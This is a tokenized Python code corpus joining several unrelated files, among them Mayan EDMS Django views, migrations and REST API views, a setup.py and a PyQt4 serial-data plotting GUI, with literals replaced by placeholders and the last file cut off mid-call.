permission_folder_delete , ) ) <EOL> except PermissionDenied : <EOL> AccessControlList . objects . check_access ( <EOL> permission_folder_delete , request . user , folder <EOL> ) <EOL> post_action_redirect = reverse ( '<STR_LIT>' ) <EOL> previous = request . POST . get ( '<STR_LIT>' , request . GET . get ( '<STR_LIT>' , request . META . get ( '<STR_LIT>' , reverse ( settings . LOGIN_REDIRECT_URL ) ) ) ) <EOL> next = request . POST . get ( '<STR_LIT>' , request . GET . get ( '<STR_LIT>' , post_action_redirect if post_action_redirect else request . META . get ( '<STR_LIT>' , reverse ( settings . LOGIN_REDIRECT_URL ) ) ) ) <EOL> if request . method == '<STR_LIT:POST>' : <EOL> try : <EOL> folder . delete ( ) <EOL> messages . 
success ( request , _ ( '<STR_LIT>' ) % folder ) <EOL> except Exception as exception : <EOL> messages . error ( request , _ ( '<STR_LIT>' ) % { <EOL> '<STR_LIT>' : folder , '<STR_LIT:error>' : exception } ) <EOL> return HttpResponseRedirect ( next ) <EOL> context = { <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : previous , <EOL> '<STR_LIT>' : next , <EOL> '<STR_LIT:object>' : folder , <EOL> '<STR_LIT:title>' : _ ( '<STR_LIT>' ) % folder , <EOL> } <EOL> return render_to_response ( <EOL> '<STR_LIT>' , context , <EOL> context_instance = RequestContext ( request ) <EOL> ) <EOL> class FolderDetailView ( DocumentListView ) : <EOL> def get_document_queryset ( self ) : <EOL> return self . get_folder ( ) . documents . all ( ) <EOL> def get_extra_context ( self ) : <EOL> return { <EOL> '<STR_LIT:title>' : _ ( '<STR_LIT>' ) % self . get_folder ( ) , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT:object>' : self . get_folder ( ) , <EOL> } <EOL> def get_folder ( self ) : <EOL> folder = get_object_or_404 ( Folder , pk = self . kwargs [ '<STR_LIT>' ] ) <EOL> try : <EOL> Permission . check_permissions ( <EOL> self . request . user , ( permission_folder_view , ) <EOL> ) <EOL> except PermissionDenied : <EOL> AccessControlList . objects . check_access ( <EOL> permission_folder_view , self . request . user , folder <EOL> ) <EOL> return folder <EOL> def folder_add_document ( request , document_id = None , document_id_list = None ) : <EOL> if document_id : <EOL> queryset = Document . objects . filter ( pk = document_id ) <EOL> elif document_id_list : <EOL> queryset = Document . objects . filter ( pk__in = document_id_list ) <EOL> if not queryset : <EOL> messages . error ( request , _ ( '<STR_LIT>' ) ) <EOL> return HttpResponseRedirect ( <EOL> request . META . get ( <EOL> '<STR_LIT>' , reverse ( settings . LOGIN_REDIRECT_URL ) <EOL> ) <EOL> ) <EOL> try : <EOL> Permission . check_permissions ( <EOL> request . 
user , ( permission_folder_add_document , ) <EOL> ) <EOL> except PermissionDenied : <EOL> queryset = AccessControlList . objects . filter_by_access ( <EOL> permission_folder_add_document , request . user , queryset <EOL> ) <EOL> post_action_redirect = None <EOL> if document_id : <EOL> post_action_redirect = reverse ( <EOL> '<STR_LIT>' , args = ( document_id , ) <EOL> ) <EOL> previous = request . POST . get ( '<STR_LIT>' , request . GET . get ( '<STR_LIT>' , request . META . get ( '<STR_LIT>' , reverse ( settings . LOGIN_REDIRECT_URL ) ) ) ) <EOL> next = request . POST . get ( '<STR_LIT>' , request . GET . get ( '<STR_LIT>' , post_action_redirect if post_action_redirect else request . META . get ( '<STR_LIT>' , reverse ( settings . LOGIN_REDIRECT_URL ) ) ) ) <EOL> if request . method == '<STR_LIT:POST>' : <EOL> form = FolderListForm ( request . POST , user = request . user ) <EOL> if form . is_valid ( ) : <EOL> folder = form . cleaned_data [ '<STR_LIT>' ] <EOL> for document in queryset : <EOL> if document . pk not in folder . documents . values_list ( '<STR_LIT>' , flat = True ) : <EOL> folder . documents . add ( document ) <EOL> messages . success ( <EOL> request , _ ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) % { <EOL> '<STR_LIT>' : document , '<STR_LIT>' : folder <EOL> } <EOL> ) <EOL> else : <EOL> messages . warning ( <EOL> request , _ ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) % { <EOL> '<STR_LIT>' : document , '<STR_LIT>' : folder <EOL> } <EOL> ) <EOL> return HttpResponseRedirect ( next ) <EOL> else : <EOL> form = FolderListForm ( user = request . user ) <EOL> context = { <EOL> '<STR_LIT>' : form , <EOL> '<STR_LIT>' : previous , <EOL> '<STR_LIT>' : next , <EOL> } <EOL> if queryset . count ( ) == <NUM_LIT:1> : <EOL> context [ '<STR_LIT:object>' ] = queryset . first ( ) <EOL> context [ '<STR_LIT:title>' ] = ungettext ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> queryset . 
count ( ) <EOL> ) <EOL> return render_to_response ( <EOL> '<STR_LIT>' , context , <EOL> context_instance = RequestContext ( request ) <EOL> ) <EOL> class DocumentFolderListView ( FolderListView ) : <EOL> def dispatch ( self , request , * args , ** kwargs ) : <EOL> self . document = get_object_or_404 ( Document , pk = self . kwargs [ '<STR_LIT>' ] ) <EOL> try : <EOL> Permission . check_permissions ( <EOL> request . user , ( permission_document_view , ) <EOL> ) <EOL> except PermissionDenied : <EOL> AccessControlList . objects . check_access ( <EOL> permission_document_view , request . user , self . document <EOL> ) <EOL> return super ( DocumentFolderListView , self ) . dispatch ( request , * args , ** kwargs ) <EOL> def get_extra_context ( self ) : <EOL> return { <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT:object>' : self . document , <EOL> '<STR_LIT:title>' : _ ( '<STR_LIT>' ) % self . document , <EOL> } <EOL> def get_folder_queryset ( self ) : <EOL> return self . document . document_folders ( ) . all ( ) <EOL> def folder_document_remove ( request , folder_id , document_id = None , document_id_list = None ) : <EOL> post_action_redirect = None <EOL> folder = get_object_or_404 ( Folder , pk = folder_id ) <EOL> if document_id : <EOL> queryset = Document . objects . filter ( pk = document_id ) <EOL> elif document_id_list : <EOL> queryset = Document . objects . filter ( pk__in = document_id_list ) <EOL> if not queryset : <EOL> messages . error ( request , _ ( '<STR_LIT>' ) ) <EOL> return HttpResponseRedirect ( request . META . get ( '<STR_LIT>' , reverse ( settings . LOGIN_REDIRECT_URL ) ) ) <EOL> try : <EOL> Permission . check_permissions ( <EOL> request . user , ( permission_folder_remove_document , ) <EOL> ) <EOL> except PermissionDenied : <EOL> queryset = AccessControlList . objects . filter_by_access ( <EOL> permission_folder_remove_document , request . user , queryset <EOL> ) <EOL> previous = request . POST . get ( '<STR_LIT>' , request . GET . 
get ( '<STR_LIT>' , request . META . get ( '<STR_LIT>' , reverse ( settings . LOGIN_REDIRECT_URL ) ) ) ) <EOL> next = request . POST . get ( '<STR_LIT>' , request . GET . get ( '<STR_LIT>' , post_action_redirect if post_action_redirect else request . META . get ( '<STR_LIT>' , reverse ( settings . LOGIN_REDIRECT_URL ) ) ) ) <EOL> if request . method == '<STR_LIT:POST>' : <EOL> for folder_document in queryset : <EOL> try : <EOL> folder . documents . remove ( folder_document ) <EOL> messages . success ( <EOL> request , _ ( <EOL> '<STR_LIT>' <EOL> ) % folder_document <EOL> ) <EOL> except Exception as exception : <EOL> messages . error ( <EOL> request , _ ( <EOL> '<STR_LIT>' <EOL> ) % { <EOL> '<STR_LIT>' : folder_document , '<STR_LIT:error>' : exception <EOL> } <EOL> ) <EOL> return HttpResponseRedirect ( next ) <EOL> context = { <EOL> '<STR_LIT>' : next , <EOL> '<STR_LIT:object>' : folder , <EOL> '<STR_LIT>' : previous , <EOL> '<STR_LIT:title>' : ungettext ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> queryset . count ( ) <EOL> ) % { '<STR_LIT>' : folder } <EOL> } <EOL> if queryset . count ( ) == <NUM_LIT:1> : <EOL> context [ '<STR_LIT:object>' ] = queryset . first ( ) <EOL> return render_to_response ( <EOL> '<STR_LIT>' , context , <EOL> context_instance = RequestContext ( request ) <EOL> ) <EOL> def folder_document_multiple_remove ( request , folder_id ) : <EOL> return folder_document_remove ( <EOL> request , folder_id , document_id_list = request . GET . get ( <EOL> '<STR_LIT>' , request . POST . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> ) . split ( '<STR_LIT:U+002C>' ) <EOL> ) <EOL> def folder_add_multiple_documents ( request ) : <EOL> return folder_add_document ( <EOL> request , document_id_list = request . GET . get ( <EOL> '<STR_LIT>' , request . POST . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> ) . split ( '<STR_LIT:U+002C>' ) <EOL> ) </s>
<s> from __future__ import unicode_literals <EOL> from django . db import models , migrations <EOL> class Migration ( migrations . Migration ) : <EOL> dependencies = [ <EOL> ] <EOL> operations = [ <EOL> migrations . CreateModel ( <EOL> name = '<STR_LIT>' , <EOL> fields = [ <EOL> ( <EOL> '<STR_LIT:id>' , models . AutoField ( <EOL> verbose_name = '<STR_LIT>' , serialize = False , auto_created = True , <EOL> primary_key = True <EOL> ) <EOL> ) , <EOL> ( <EOL> '<STR_LIT>' , models . DateTimeField ( <EOL> auto_now_add = True , verbose_name = '<STR_LIT>' <EOL> ) <EOL> ) , <EOL> ( <EOL> '<STR_LIT>' , models . IntegerField ( <EOL> default = <NUM_LIT:30> , verbose_name = '<STR_LIT>' <EOL> ) <EOL> ) , <EOL> ( <EOL> '<STR_LIT:name>' , models . CharField ( <EOL> unique = True , max_length = <NUM_LIT> , verbose_name = '<STR_LIT:Name>' <EOL> ) <EOL> ) , <EOL> ] , <EOL> options = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } , <EOL> bases = ( models . Model , ) , <EOL> ) , <EOL> ] </s>
<s> from __future__ import unicode_literals <EOL> from django . db import models , migrations <EOL> class Migration ( migrations . Migration ) : <EOL> dependencies = [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> operations = [ <EOL> migrations . CreateModel ( <EOL> name = '<STR_LIT>' , <EOL> fields = [ <EOL> ( <EOL> '<STR_LIT:id>' , models . AutoField ( <EOL> verbose_name = '<STR_LIT>' , serialize = False , <EOL> auto_created = True , primary_key = True <EOL> ) <EOL> ) , <EOL> ( <EOL> '<STR_LIT:value>' , models . CharField ( <EOL> db_index = True , max_length = <NUM_LIT:255> , null = True , <EOL> verbose_name = '<STR_LIT>' , blank = True <EOL> ) <EOL> ) , <EOL> ( <EOL> '<STR_LIT>' , models . ForeignKey ( <EOL> related_name = '<STR_LIT>' , verbose_name = '<STR_LIT>' , <EOL> to = '<STR_LIT>' <EOL> ) <EOL> ) , <EOL> ] , <EOL> options = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } , <EOL> bases = ( models . Model , ) , <EOL> ) , <EOL> migrations . CreateModel ( <EOL> name = '<STR_LIT>' , <EOL> fields = [ <EOL> ( <EOL> '<STR_LIT:id>' , models . AutoField ( <EOL> verbose_name = '<STR_LIT>' , serialize = False , <EOL> auto_created = True , primary_key = True <EOL> ) <EOL> ) , <EOL> ( <EOL> '<STR_LIT>' , models . BooleanField ( <EOL> default = False , verbose_name = '<STR_LIT>' <EOL> ) <EOL> ) , <EOL> ( <EOL> '<STR_LIT>' , models . ForeignKey ( <EOL> related_name = '<STR_LIT>' , <EOL> verbose_name = '<STR_LIT>' , <EOL> to = '<STR_LIT>' <EOL> ) <EOL> ) , <EOL> ] , <EOL> options = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } , <EOL> bases = ( models . Model , ) , <EOL> ) , <EOL> migrations . CreateModel ( <EOL> name = '<STR_LIT>' , <EOL> fields = [ <EOL> ( <EOL> '<STR_LIT:id>' , models . AutoField ( <EOL> verbose_name = '<STR_LIT>' , serialize = False , <EOL> auto_created = True , primary_key = True <EOL> ) <EOL> ) , <EOL> ( <EOL> '<STR_LIT:name>' , models . 
CharField ( <EOL> help_text = '<STR_LIT>' <EOL> '<STR_LIT>' , unique = True , max_length = <NUM_LIT> , <EOL> verbose_name = '<STR_LIT:Name>' <EOL> ) <EOL> ) , <EOL> ( <EOL> '<STR_LIT:title>' , models . CharField ( <EOL> max_length = <NUM_LIT> , verbose_name = '<STR_LIT>' <EOL> ) <EOL> ) , <EOL> ( <EOL> '<STR_LIT:default>' , models . CharField ( <EOL> help_text = '<STR_LIT>' , <EOL> max_length = <NUM_LIT> , null = True , verbose_name = '<STR_LIT>' , <EOL> blank = True <EOL> ) <EOL> ) , <EOL> ( <EOL> '<STR_LIT>' , models . TextField ( <EOL> help_text = '<STR_LIT>' <EOL> '<STR_LIT>' , null = True , <EOL> verbose_name = '<STR_LIT>' , blank = True ) <EOL> ) , <EOL> ( <EOL> '<STR_LIT>' , models . CharField ( <EOL> blank = True , max_length = <NUM_LIT:64> , <EOL> verbose_name = '<STR_LIT>' , <EOL> choices = [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> ] <EOL> ) <EOL> ) , <EOL> ] , <EOL> options = { <EOL> '<STR_LIT>' : ( '<STR_LIT:title>' , ) , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } , <EOL> bases = ( models . Model , ) , <EOL> ) , <EOL> migrations . AddField ( <EOL> model_name = '<STR_LIT>' , <EOL> name = '<STR_LIT>' , <EOL> field = models . ForeignKey ( <EOL> verbose_name = '<STR_LIT>' , to = '<STR_LIT>' <EOL> ) , <EOL> preserve_default = True , <EOL> ) , <EOL> migrations . AlterUniqueTogether ( <EOL> name = '<STR_LIT>' , <EOL> unique_together = set ( [ ( '<STR_LIT>' , '<STR_LIT>' ) ] ) , <EOL> ) , <EOL> migrations . AddField ( <EOL> model_name = '<STR_LIT>' , <EOL> name = '<STR_LIT>' , <EOL> field = models . ForeignKey ( <EOL> verbose_name = '<STR_LIT>' , to = '<STR_LIT>' <EOL> ) , <EOL> preserve_default = True , <EOL> ) , <EOL> migrations . AlterUniqueTogether ( <EOL> name = '<STR_LIT>' , <EOL> unique_together = set ( [ ( '<STR_LIT>' , '<STR_LIT>' ) ] ) , <EOL> ) , <EOL> ] </s>
<s> from __future__ import unicode_literals <EOL> from django . utils . translation import ugettext_lazy as _ <EOL> from common . apps import MayanAppConfig <EOL> class NavigationApp ( MayanAppConfig ) : <EOL> name = '<STR_LIT>' <EOL> test = True <EOL> verbose_name = _ ( '<STR_LIT>' ) </s>
<s> from __future__ import unicode_literals <EOL> from django . utils . translation import ugettext_lazy as _ <EOL> from navigation import Link <EOL> link_api = Link ( <EOL> icon = '<STR_LIT>' , tags = '<STR_LIT>' , text = _ ( '<STR_LIT>' ) , <EOL> view = '<STR_LIT>' <EOL> ) <EOL> link_api_documentation = Link ( <EOL> icon = '<STR_LIT>' , tags = '<STR_LIT>' , text = _ ( '<STR_LIT>' ) , <EOL> view = '<STR_LIT>' <EOL> ) </s>
<s> from __future__ import unicode_literals <EOL> from django . db import models , migrations <EOL> class Migration ( migrations . Migration ) : <EOL> dependencies = [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> operations = [ <EOL> migrations . AddField ( <EOL> model_name = '<STR_LIT>' , <EOL> name = '<STR_LIT>' , <EOL> field = models . CharField ( <EOL> default = '<STR_LIT>' , help_text = '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> max_length = <NUM_LIT> , verbose_name = '<STR_LIT>' <EOL> ) , <EOL> preserve_default = True , <EOL> ) , <EOL> ] </s>
<s> from __future__ import unicode_literals <EOL> from django import apps <EOL> from django . utils . translation import ugettext_lazy as _ <EOL> class StorageApp ( apps . AppConfig ) : <EOL> name = '<STR_LIT>' <EOL> verbose_name = _ ( '<STR_LIT>' ) </s>
<s> from __future__ import unicode_literals <EOL> from django . contrib . auth . models import Group , User <EOL> from rest_framework import generics <EOL> from rest_api . filters import MayanObjectPermissionsFilter <EOL> from rest_api . permissions import MayanPermission <EOL> from . permissions import ( <EOL> permission_group_create , permission_group_delete , permission_group_edit , <EOL> permission_group_view , permission_user_create , permission_user_delete , <EOL> permission_user_edit , permission_user_view <EOL> ) <EOL> from . serializers import GroupSerializer , UserSerializer <EOL> class APIGroupListView ( generics . ListCreateAPIView ) : <EOL> filter_backends = ( MayanObjectPermissionsFilter , ) <EOL> mayan_object_permissions = { '<STR_LIT:GET>' : ( permission_group_view , ) } <EOL> mayan_view_permissions = { '<STR_LIT:POST>' : ( permission_group_create , ) } <EOL> permission_classes = ( MayanPermission , ) <EOL> queryset = Group . objects . all ( ) <EOL> serializer_class = GroupSerializer <EOL> def get ( self , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> return super ( APIGroupListView , self ) . get ( * args , ** kwargs ) <EOL> def post ( self , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> return super ( APIGroupListView , self ) . post ( * args , ** kwargs ) <EOL> class APIGroupView ( generics . RetrieveUpdateDestroyAPIView ) : <EOL> mayan_object_permissions = { <EOL> '<STR_LIT:GET>' : ( permission_group_view , ) , <EOL> '<STR_LIT>' : ( permission_group_edit , ) , <EOL> '<STR_LIT>' : ( permission_group_edit , ) , <EOL> '<STR_LIT>' : ( permission_group_delete , ) <EOL> } <EOL> permission_classes = ( MayanPermission , ) <EOL> queryset = Group . objects . all ( ) <EOL> serializer_class = GroupSerializer <EOL> def delete ( self , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> return super ( APIGroupView , self ) . 
delete ( * args , ** kwargs ) <EOL> def get ( self , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> return super ( APIGroupView , self ) . get ( * args , ** kwargs ) <EOL> def patch ( self , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> return super ( APIGroupView , self ) . patch ( * args , ** kwargs ) <EOL> def put ( self , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> return super ( APIGroupView , self ) . put ( * args , ** kwargs ) <EOL> class APIUserListView ( generics . ListCreateAPIView ) : <EOL> filter_backends = ( MayanObjectPermissionsFilter , ) <EOL> mayan_object_permissions = { '<STR_LIT:GET>' : ( permission_user_view , ) } <EOL> mayan_view_permissions = { '<STR_LIT:POST>' : ( permission_user_create , ) } <EOL> permission_classes = ( MayanPermission , ) <EOL> queryset = User . objects . all ( ) <EOL> serializer_class = UserSerializer <EOL> def get ( self , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> return super ( APIUserListView , self ) . get ( * args , ** kwargs ) <EOL> def post ( self , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> return super ( APIUserListView , self ) . post ( * args , ** kwargs ) <EOL> class APIUserView ( generics . RetrieveUpdateDestroyAPIView ) : <EOL> mayan_object_permissions = { <EOL> '<STR_LIT:GET>' : ( permission_user_view , ) , <EOL> '<STR_LIT>' : ( permission_user_edit , ) , <EOL> '<STR_LIT>' : ( permission_user_edit , ) , <EOL> '<STR_LIT>' : ( permission_user_delete , ) <EOL> } <EOL> permission_classes = ( MayanPermission , ) <EOL> queryset = User . objects . all ( ) <EOL> serializer_class = UserSerializer <EOL> def delete ( self , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> return super ( APIUserView , self ) . delete ( * args , ** kwargs ) <EOL> def get ( self , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> return super ( APIUserView , self ) . 
get ( * args , ** kwargs ) <EOL> def patch ( self , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> return super ( APIUserView , self ) . patch ( * args , ** kwargs ) <EOL> def put ( self , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> return super ( APIUserView , self ) . put ( * args , ** kwargs ) <EOL> class APICurrentUserView ( generics . RetrieveUpdateDestroyAPIView ) : <EOL> serializer_class = UserSerializer <EOL> def get_object ( self ) : <EOL> return self . request . user <EOL> def delete ( self , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> return super ( APICurrentUserView , self ) . delete ( * args , ** kwargs ) <EOL> def get ( self , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> return super ( APICurrentUserView , self ) . get ( * args , ** kwargs ) <EOL> def patch ( self , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> return super ( APICurrentUserView , self ) . patch ( * args , ** kwargs ) <EOL> def put ( self , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> return super ( APICurrentUserView , self ) . put ( * args , ** kwargs ) </s>
<s> from setuptools import setup <EOL> setup ( <EOL> name = '<STR_LIT>' , <EOL> packages = [ '<STR_LIT>' ] , <EOL> version = '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> author = '<STR_LIT>' , <EOL> author_email = '<STR_LIT>' , <EOL> url = '<STR_LIT>' , <EOL> download_url = '<STR_LIT>' , <EOL> keywords = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , <EOL> classifiers = [ ] , <EOL> entry_points = { <EOL> '<STR_LIT>' : [ <EOL> '<STR_LIT>' <EOL> ] , <EOL> } , <EOL> install_requires = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> ) </s>
<s> """<STR_LIT>""" <EOL> import random , sys , Queue , serial , glob , os , csv , time <EOL> import PyQt4 . Qwt5 as Qwt <EOL> from PyQt4 . QtCore import * <EOL> from PyQt4 . QtGui import * <EOL> from com_monitor import ComMonitorThread <EOL> from globals import * <EOL> class PlottingDataMonitor ( QMainWindow ) : <EOL> def __init__ ( self , parent = None ) : <EOL> super ( PlottingDataMonitor , self ) . __init__ ( parent ) <EOL> self . setWindowTitle ( '<STR_LIT>' ) <EOL> self . resize ( <NUM_LIT> , <NUM_LIT> ) <EOL> self . port = "<STR_LIT>" <EOL> self . baudrate = <NUM_LIT> <EOL> self . monitor_active = False <EOL> self . com_monitor = None <EOL> self . com_data_q = None <EOL> self . com_error_q = None <EOL> self . livefeed = LiveDataFeed ( ) <EOL> self . timer = QTimer ( ) <EOL> self . g_samples = [ [ ] , [ ] , [ ] ] <EOL> self . curve = [ None ] * <NUM_LIT:3> <EOL> self . gcurveOn = [ <NUM_LIT:1> ] * <NUM_LIT:3> <EOL> self . csvdata = [ ] <EOL> self . create_menu ( ) <EOL> self . create_main_frame ( ) <EOL> self . create_status_bar ( ) <EOL> self . connect ( self . button_Connect , SIGNAL ( "<STR_LIT>" ) , <EOL> self . OnStart ) <EOL> self . connect ( self . button_Disconnect , SIGNAL ( "<STR_LIT>" ) , <EOL> self . OnStop ) <EOL> def create_com_box ( self ) : <EOL> """<STR_LIT>""" <EOL> self . com_box = QGroupBox ( "<STR_LIT>" ) <EOL> com_layout = QGridLayout ( ) <EOL> self . radio9600 = QRadioButton ( "<STR_LIT>" ) <EOL> self . radio9600 . setChecked ( <NUM_LIT:1> ) <EOL> self . radio19200 = QRadioButton ( "<STR_LIT>" ) <EOL> self . Com_ComboBox = QComboBox ( ) <EOL> com_layout . addWidget ( self . Com_ComboBox , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> ) <EOL> com_layout . addWidget ( self . radio9600 , <NUM_LIT:1> , <NUM_LIT:0> ) <EOL> com_layout . addWidget ( self . radio19200 , <NUM_LIT:1> , <NUM_LIT:1> ) <EOL> self . fill_ports_combobox ( ) <EOL> self . button_Connect = QPushButton ( "<STR_LIT>" ) <EOL> self . 
button_Disconnect = QPushButton ( "<STR_LIT>" ) <EOL> self . button_Disconnect . setEnabled ( False ) <EOL> com_layout . addWidget ( self . button_Connect , <NUM_LIT:0> , <NUM_LIT:2> ) <EOL> com_layout . addWidget ( self . button_Disconnect , <NUM_LIT:1> , <NUM_LIT:2> ) <EOL> return com_layout <EOL> def create_plot ( self ) : <EOL> """<STR_LIT>""" <EOL> plot = Qwt . QwtPlot ( self ) <EOL> plot . setCanvasBackground ( Qt . black ) <EOL> plot . setAxisTitle ( Qwt . QwtPlot . xBottom , '<STR_LIT>' ) <EOL> plot . setAxisScale ( Qwt . QwtPlot . xBottom , <NUM_LIT:0> , <NUM_LIT:10> , <NUM_LIT:1> ) <EOL> plot . setAxisTitle ( Qwt . QwtPlot . yLeft , '<STR_LIT>' ) <EOL> plot . setAxisScale ( Qwt . QwtPlot . yLeft , YMIN , YMAX , ( YMAX - YMIN ) / <NUM_LIT:10> ) <EOL> plot . replot ( ) <EOL> curve = [ None ] * <NUM_LIT:3> <EOL> pen = [ QPen ( QColor ( '<STR_LIT>' ) ) , QPen ( QColor ( '<STR_LIT>' ) ) , QPen ( QColor ( '<STR_LIT>' ) ) ] <EOL> for i in range ( <NUM_LIT:3> ) : <EOL> curve [ i ] = Qwt . QwtPlotCurve ( '<STR_LIT>' ) <EOL> curve [ i ] . setRenderHint ( Qwt . QwtPlotItem . RenderAntialiased ) <EOL> pen [ i ] . setWidth ( <NUM_LIT:2> ) <EOL> curve [ i ] . setPen ( pen [ i ] ) <EOL> curve [ i ] . attach ( plot ) <EOL> return plot , curve <EOL> def create_knob ( self ) : <EOL> """<STR_LIT>""" <EOL> knob = Qwt . QwtKnob ( self ) <EOL> knob . setRange ( <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT:1> ) <EOL> knob . setScaleMaxMajor ( <NUM_LIT:10> ) <EOL> knob . setKnobWidth ( <NUM_LIT:50> ) <EOL> knob . setValue ( <NUM_LIT:10> ) <EOL> return knob <EOL> def create_status_bar ( self ) : <EOL> self . status_text = QLabel ( '<STR_LIT>' ) <EOL> self . statusBar ( ) . addWidget ( self . status_text , <NUM_LIT:1> ) <EOL> def create_checkbox ( self , label , color , connect_fn , connect_param ) : <EOL> """<STR_LIT>""" <EOL> checkBox = QCheckBox ( label ) <EOL> checkBox . setChecked ( <NUM_LIT:1> ) <EOL> checkBox . 
setFont ( QFont ( "<STR_LIT>" , pointSize = <NUM_LIT:12> , weight = QFont . Bold ) ) <EOL> green = QPalette ( ) <EOL> green . setColor ( QPalette . Foreground , color ) <EOL> checkBox . setPalette ( green ) <EOL> self . connect ( checkBox , SIGNAL ( "<STR_LIT>" ) , partial ( connect_fn , connect_param ) ) <EOL> return checkBox <EOL> def create_main_frame ( self ) : <EOL> """<STR_LIT>""" <EOL> portname_layout = self . create_com_box ( ) <EOL> self . com_box . setLayout ( portname_layout ) <EOL> self . updatespeed_knob = self . create_knob ( ) <EOL> self . connect ( self . updatespeed_knob , SIGNAL ( '<STR_LIT>' ) , <EOL> self . on_knob_change ) <EOL> self . knob_l = QLabel ( '<STR_LIT>' % self . updatespeed_knob . value ( ) ) <EOL> self . knob_l . setAlignment ( Qt . AlignTop | Qt . AlignHCenter ) <EOL> self . plot , self . curve = self . create_plot ( ) <EOL> self . max_spin = QSpinBox ( ) <EOL> self . max_spin . setMaximum ( <NUM_LIT:1000> ) <EOL> self . max_spin . setValue ( <NUM_LIT:1000> ) <EOL> spins_hbox = QHBoxLayout ( ) <EOL> spins_hbox . addWidget ( QLabel ( '<STR_LIT>' ) ) <EOL> spins_hbox . addWidget ( self . max_spin ) <EOL> spins_hbox . addWidget ( QLabel ( '<STR_LIT>' ) ) <EOL> self . gCheckBox = [ self . create_checkbox ( "<STR_LIT>" , Qt . green , self . activate_curve , <NUM_LIT:0> ) , <EOL> self . create_checkbox ( "<STR_LIT>" , Qt . red , self . activate_curve , <NUM_LIT:1> ) , <EOL> self . create_checkbox ( "<STR_LIT>" , Qt . yellow , self . activate_curve , <NUM_LIT:2> ) <EOL> ] <EOL> self . button_clear = QPushButton ( "<STR_LIT>" ) <EOL> self . connect ( self . button_clear , SIGNAL ( "<STR_LIT>" ) , <EOL> self . clear_screen ) <EOL> plot_layout = QGridLayout ( ) <EOL> plot_layout . addWidget ( self . plot , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:8> , <NUM_LIT:7> ) <EOL> plot_layout . addWidget ( self . gCheckBox [ <NUM_LIT:0> ] , <NUM_LIT:0> , <NUM_LIT:8> ) <EOL> plot_layout . addWidget ( self . 
gCheckBox [ <NUM_LIT:1> ] , <NUM_LIT:1> , <NUM_LIT:8> ) <EOL> plot_layout . addWidget ( self . gCheckBox [ <NUM_LIT:2> ] , <NUM_LIT:2> , <NUM_LIT:8> ) <EOL> plot_layout . addWidget ( self . button_clear , <NUM_LIT:3> , <NUM_LIT:8> ) <EOL> plot_layout . addLayout ( spins_hbox , <NUM_LIT:4> , <NUM_LIT:8> ) <EOL> plot_layout . addWidget ( self . updatespeed_knob , <NUM_LIT:5> , <NUM_LIT:8> ) <EOL> plot_layout . addWidget ( self . knob_l , <NUM_LIT:6> , <NUM_LIT:8> ) <EOL> plot_groupbox = QGroupBox ( '<STR_LIT>' ) <EOL> plot_groupbox . setLayout ( plot_layout ) <EOL> self . main_frame = QWidget ( ) <EOL> main_layout = QVBoxLayout ( ) <EOL> main_layout . addWidget ( self . com_box ) <EOL> main_layout . addWidget ( plot_groupbox ) <EOL> main_layout . addStretch ( <NUM_LIT:1> ) <EOL> self . main_frame . setLayout ( main_layout ) <EOL> self . setCentralWidget ( self . main_frame ) <EOL> def clear_screen ( self ) : <EOL> g_samples [ <NUM_LIT:0> ] = [ ] <EOL> def activate_curve ( self , axe ) : <EOL> if self . gCheckBox [ axe ] . isChecked ( ) : <EOL> self . gcurveOn [ axe ] = <NUM_LIT:1> <EOL> else : <EOL> self . gcurveOn [ axe ] = <NUM_LIT:0> <EOL> def create_menu ( self ) : <EOL> self . file_menu = self . menuBar ( ) . addMenu ( "<STR_LIT>" ) <EOL> selectport_action = self . create_action ( "<STR_LIT>" , <EOL> shortcut = "<STR_LIT>" , 